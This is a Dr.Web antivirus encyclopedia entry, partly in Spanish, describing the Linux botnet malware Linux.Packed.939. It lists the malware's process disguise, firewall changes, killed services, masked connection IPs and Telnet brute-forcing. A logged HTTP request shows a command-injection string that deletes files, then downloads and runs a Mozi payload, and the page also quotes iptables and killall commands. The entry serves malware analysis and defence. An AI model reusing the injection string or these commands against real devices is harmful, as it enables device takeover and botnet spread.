Mi biblioteca
Mi biblioteca

+ Añadir a la biblioteca

Soporte
Soporte 24 horas | Normas de contactar

Sus solicitudes

Perfil

Linux.Packed.939

Added to the Dr.Web virus database: 2020-10-02

Virus description added:

Technical Information

Malicious functions:
Launches itself as a daemon
Substitutes application name for:
  • sshd
Modifies firewall settings:
  • iptables -I INPUT -p tcp --destination-port 36101 -j ACCEPT
Launches processes:
  • /bin/sh -c killall -9 telnetd utelnetd scfgmgr
  • /bin/sh -c iptables -I INPUT -p tcp --destination-port 36101 -j ACCEPT
Attempts to kill the following processes:
  • killall -9 telnetd utelnetd scfgmgr
Performs operations with the file system:
Creates or modifies files:
  • /root/.ips
Network activity:
Awaits incoming connections on ports:
  • 127.0.0.1:14737
  • 0.0.0.0:33445
  • 0.0.0.0:36101
Establishes connection:
  • 8.#.8.8:53
  • 31.###.219.21:49152
  • 19.###.207.110:5555
  • 16#.##.196.211:52869
  • 55.##.193.72:80
  • 3.###.91.142:52869
  • 21#.##.180.57:37215
  • 15#.##5.107.54:7574
  • 21.##.175.241:52869
  • 17#.###.132.201:8443
  • 7.##.5.148:7574
  • 11#.#7.122.7:80
  • 10#.###.89.139:37215
  • 51.##.71.194:81
  • 10#.##.80.240:81
  • 94.###.103.187:80
  • 62.###.190.38:37215
  • 77.##.75.69:8443
  • 41.###.65.243:5555
  • 7.##.#02.154:5555
  • 20#.##.215.173:8080
  • 16#.##.43.63:37215
  • 20#.##0.52.34:80
  • 11#.##.115.118:80
  • 69.###.206.83:80
  • 14#.##.234.93:37215
  • 12#.##8.185.33:7574
  • 15#.##9.13.77:8080
  • 82.###.36.76:52869
  • 12#.##8.16.12:8080
  • 78.##.108.189:5555
  • 60.###.121.7:8080
  • 14#.##.219.30:7574
  • 22#.##.13.150:49152
  • 6.###.232.15:5555
  • 19#.###.247.206:8443
  • 21#.##.188.251:8080
  • 21#.##.208.86:8443
  • 13#.##8.113.188:80
  • 11#.##2.67.219:81
  • 11#.##5.62.65:81
  • 11#.##7.213.93:80
  • 18#.##8.218.231:81
  • 19#.##4.30.142:8080
  • 74.###.1.205:7574
  • 10#.#.225.35:52869
  • 76.###.67.29:8080
  • 10#.##.26.7:49152
  • 11#.##.199.104:80
  • 18#.##0.17.121:81
  • 16#.###.108.149:37215
  • 21#.##.34.94:8443
  • 13.##.211.47:8080
  • 17#.##.78.17:7574
  • 19.##1.169.4:81
  • 89.##.11.203:8080
  • 17#.##.193.30:5555
  • 13#.##6.182.46:80
  • 14#.##.156.23:37215
  • 15.##.38.160:5555
  • 25.###.26.163:80
  • 78.###.187.233:52869
  • 12#.##5.48.123:80
  • 53.###.2.10:8080
  • 28.###.26.110:37215
  • 16#.###.165.66:49152
  • 10#.##3.165.15:8080
  • 20#.##.183.131:49152
  • 56.###.72.83:49152
  • 14#.##2.70.54:52869
  • 34.###.20.76:5555
  • 38.###.231.25:80
  • 41.###.251.19:80
  • 97.###.185.55:7574
  • 18#.##5.195.73:80
  • 15#.##1.154.62:81
  • 72.##.113.143:80
  • 65.###.140.91:8080
  • 13#.##6.82.184:5555
  • 16#.###.170.214:8080
  • 13#.##2.178.140:80
  • 14#.##.110.217:7574
  • 89.###.172.124:8080
  • 18#.###.218.86:49152
  • 13#.###.232.240:52869
  • 59.##.183.190:37215
  • 82.###.213.195:8080
  • 84.###.27.208:80
  • 70.#.#44.184:7574
  • 54.###.209.130:8080
  • 17#.##.97.244:80
  • 14#.###.229.189:7574
  • 81.###.119.34:8080
  • 64.###.118.96:8080
  • 20#.##.108.140:81
  • 11#.###.25.142:52869
  • 16#.##.164.35:8443
  • 25.###.49.16:8080
  • 46.###.96.250:80
  • 11#.##.246.54:5555
  • 21#.##6.104.75:8443
  • 21#.##4.232.100:80
  • 18#.#7.82.46:80
  • 14#.##8.241.41:8080
  • 6.###.120.127:80
  • 56.##.252.121:81
  • 38.##4.9.22:80
  • 12#.##.50.66:37215
  • 36.#.25.32:8080
  • 11#.###.197.240:8080
  • 21#.##.89.146:52869
  • 21#.##2.247.0:8443
  • 72.###.28.130:80
  • 11#.##0.100.63:80
  • <LOCAL_GATE>03:80
  • 10#.##7.32.25:80
  • 21#.##9.223.144:81
  • 52.###.7.100:8080
  • 19#.###.71.201:52869
  • 12#.##.170.164:37215
  • 17#.##.128.138:37215
  • 69.##.147.83:80
  • 28.###.27.197:81
  • 10#.##.240.111:7574
  • 11#.###.190.245:5555
  • 17#.##1.245.40:8080
  • 19#.##8.119.79:8443
  • 39.##.11.6:52869
  • 91.##.210.74:80
  • 37.###.205.32:80
  • 41.###.18.236:49152
  • 10#.##8.201.19:80
  • 20#.##8.214.238:80
  • 65.###.214.107:80
  • 2.###.169.127:8080
  • 20#.##.219.140:80
  • 14#.##.65.138:80
  • 11#.##.235.19:80
  • 85.###.229.172:7574
  • 51.##.46.48:8443
  • 21#.##.107.22:80
  • 89.##.141.91:49152
  • 19#.###.245.196:7574
  • 22#.##.117.119:80
  • 30.##7.8.198:80
  • 16.###.62.172:49152
  • 19#.###.60.229:49152
  • 15.###.237.84:80
  • 18#.##.56.38:8080
  • 39.###.10.210:81
  • 20#.##2.142.40:7574
  • 14#.##.179.252:80
  • 20#.##9.31.243:80
  • 20#.###.115.49:49152
  • 12#.##.80.117:37215
  • 19.##.37.165:8080
  • 71.##.236.105:80
  • 12#.##0.183.59:80
  • 64.###.188.254:5555
  • 18#.##.11.221:81
  • 17#.##4.179.221:80
  • 14#.##.86.230:5555
  • 15#.##.59.66:37215
  • 22#.###.133.160:8080
  • 11#.##9.24.42:8080
  • 13.###.26.199:49152
  • 78.##1.53.66:80
  • 11#.##.116.4:5555
  • 98.#.81.108:81
  • 62.##.70.221:80
  • 42.###.61.197:80
  • 39.##.161.134:37215
  • 15#.##.214.66:52869
  • 20.###.125.112:80
  • 12#.##3.232.124:80
  • 16#.###.219.95:52869
  • 20#.##8.221.51:80
  • 15#.##2.26.2:8443
  • 83.##.14.247:80
  • 75.###.94.251:5555
  • 82.##.97.109:52869
  • 51.###.205.78:80
  • 15#.#2.65.42:80
  • 19#.##6.226.97:81
  • 17#.###.251.184:49152
  • 10#.##0.155.72:8080
  • 15#.##.101.98:8080
  • 17#.###.23.234:49152
  • 21#.##.172.171:8080
  • 95.###.1.104:8080
  • 14#.##9.150.97:81
  • 44.##.132.249:81
  • 40.##.200.135:80
  • 17#.##.236.18:81
  • 16#.##4.55.83:81
  • 19.##.119.136:8080
  • 13#.##.3.253:5555
  • 13#.##5.16.43:8080
  • 5.###.231.111:8080
  • 19#.#1.75.10:81
  • 53.###.51.197:52869
  • 50.###.55.60:52869
  • 18.###.179.64:8080
  • 15#.#8.19.63:81
  • 19#.###.215.26:52869
  • 21.###.189.251:5555
  • 89.###.31.113:8080
  • 16#.##.143.225:52869
  • 80.##.211.120:52869
  • 24.##.42.8:80
  • 16#.##.8.207:8080
  • 68.#.#68.215:49152
  • 19#.##8.95.195:81
  • 19#.##5.212.215:80
  • 72.##.91.92:49152
  • 87.##.69.120:81
  • 13#.##2.146.178:81
  • 19#.###.154.222:49152
  • 50.##.192.191:5555
  • 29.##.171.195:80
  • 11#.##5.212.125:81
  • 43.##.232.161:80
  • 43.##.25.193:8080
  • 61.###.138.148:37215
  • 20#.###.225.41:37215
  • 76.###.20.244:7574
  • 21#.##.177.95:8080
  • 19#.#.61.32:5555
  • 25.##.238.249:8080
  • 11#.##.115.120:5555
  • 16#.##6.32.143:8080
  • 73.###.143.96:37215
  • 40.##.118.148:8080
  • 19#.##4.218.228:80
  • 10#.###.184.149:52869
  • 98.###.6.36:5555
  • 13#.##4.83.4:52869
  • 12#.##0.92.232:8080
  • 22#.##0.26.131:7574
  • 16#.##8.83.71:8080
  • 21#.##6.17.93:52869
  • 16#.##.24.162:5555
  • 18#.###.229.147:8443
  • 39.##.42.239:80
  • 10#.##.208.47:81
  • 17#.###.74.244:52869
  • 19#.##5.5.138:37215
  • 24.###.47.131:81
  • 13#.##2.198.122:81
  • 9.##.#7.55:52869
  • 12#.##.100.204:81
  • 16#.###.144.190:37215
  • 16#.##5.136.15:7574
  • 75.#.#2.251:52869
  • 16#.##7.241.0:8080
  • 16#.##.203.120:80
  • 47.###.229.27:80
  • 10#.##.39.211:52869
  • 67.###.221.251:80
  • 10#.##6.191.82:80
  • 17#.##6.120.75:8080
  • 39.#.#.145:49152
  • 35.###.49.176:8080
  • 62.###.141.232:80
  • 63.##.252.131:7574
  • 19.##.101.214:8080
  • 56.###.49.197:8080
  • 40.##.230.1:8080
  • 42.###.134.46:52869
  • 20#.###.106.143:8080
  • 15#.##7.43.161:5555
  • 46.#.#28.223:52869
  • 37.##2.66.90:80
  • 11#.##.118.199:8080
  • 10#.##8.63.193:81
  • 17#.##5.148.202:81
  • 23.##.168.45:81
  • 20#.##.30.17:8080
  • 21#.##.140.201:8443
  • 16#.##.178.227:8080
  • 61.##.105.69:8443
  • 10#.##.43.17:7574
  • 19#.##8.215.233:80
  • 10#.##7.38.86:80
  • 21#.##9.195.95:5555
  • 19#.##0.72.84:37215
  • 22.###.65.205:8080
  • 10#.##1.38.107:8080
  • 16#.##0.64.44:7574
  • 89.##.113.130:8443
  • 15#.##.212.41:80
  • 3.##.23.127:80
  • 61.###.92.80:8080
  • 63.##.196.30:8080
  • 13#.#.224.19:81
  • 14#.###.197.177:37215
  • 12#.##.160.168:52869
Attacks using a special dictionary (brute-force technique) via the Telnet protocol.
HTTP GET requests:
  • 17#.###.#.###################;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
Sends data to the following servers:
  • 23#.###.255.250:1900
  • 23.###.114.224:1023
  • 19#.##7.4.144:2323
  • 38.###.244.196:2323
  • 65.##.233.34:2323
  • 21#.##.155.97:2323
  • 18#.###.207.246:2323
  • 95.###.18.96:2323
  • 83.###.223.84:2323
  • 10#.##.110.255:2323
  • 17#.##3.50.146:2323
  • 18#.###.130.133:2323
  • 97.###.205.163:2323
  • 15#.##.64.132:2323
  • 21#.##2.104.22:1023
  • 16#.###.217.162:2323
  • 15#.##.169.165:2323
  • 21#.###.110.223:2323
  • 63.###.224.150:1023
  • 13#.##0.2.55:2323
  • 18#.#.253.118:2323
  • 10#.##5.34.140:2323
  • 11#.##.174.203:2323
  • 14#.###.132.181:2323
  • 48.##.57.104:2323
  • 60.##.22.239:2323
  • 77.###.247.78:2323
  • 84.###.235.240:2323
  • 1.###.124.92:2323
  • 11#.###.167.164:2323
  • 67.###.153.145:2323
  • 13#.###.118.195:1023
  • 14#.##1.9.49:2323
  • 34.###.90.48:2323
  • 14#.#.213.142:2323
  • 16#.##.57.251:1023
  • 13#.##8.80.11:2323
  • 16#.##8.45.12:2323
  • 17#.##2.234.48:2323
  • 86.#.#7.108:2323
  • 20#.##.141.55:2323
  • 19#.##8.215.66:2323
  • 19#.###.235.243:2323
  • 5.##.#61.168:2323
  • 16#.##4.89.218:2323
  • 19.###.134.24:2323
  • 11#.##3.81.167:2323
  • 11#.##2.13.107:2323
  • 5.###.177.34:1023
  • 20#.###.103.217:2323
  • 10#.##.150.183:2323
  • 13#.###.137.187:2323
  • 10#.##1.238.52:1023
  • 18#.##.116.223:2323
  • 5.##.#55.166:2323
  • 19#.##4.60.213:2323
  • 62.##.0.177:2323
  • 20#.##.205.144:2323
  • 46.###.96.140:2323
  • 16#.##3.143.45:2323
  • 31.#.#4.233:2323
  • 19#.###.141.159:2323
  • 12#.##9.244.81:2323
  • 89.##.191.66:2323
  • 20#.##9.38.196:2323
  • 11#.##8.12.104:1023
  • 20.###.85.177:2323
  • 78.##.73.5:2323
  • 21#.##3.13.193:2323
Other:
Collects information about network activity

Curing recommendations


Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Free trial

One month (no registration) or three months (registration and renewal discount)

Download Dr.Web

Download by serial number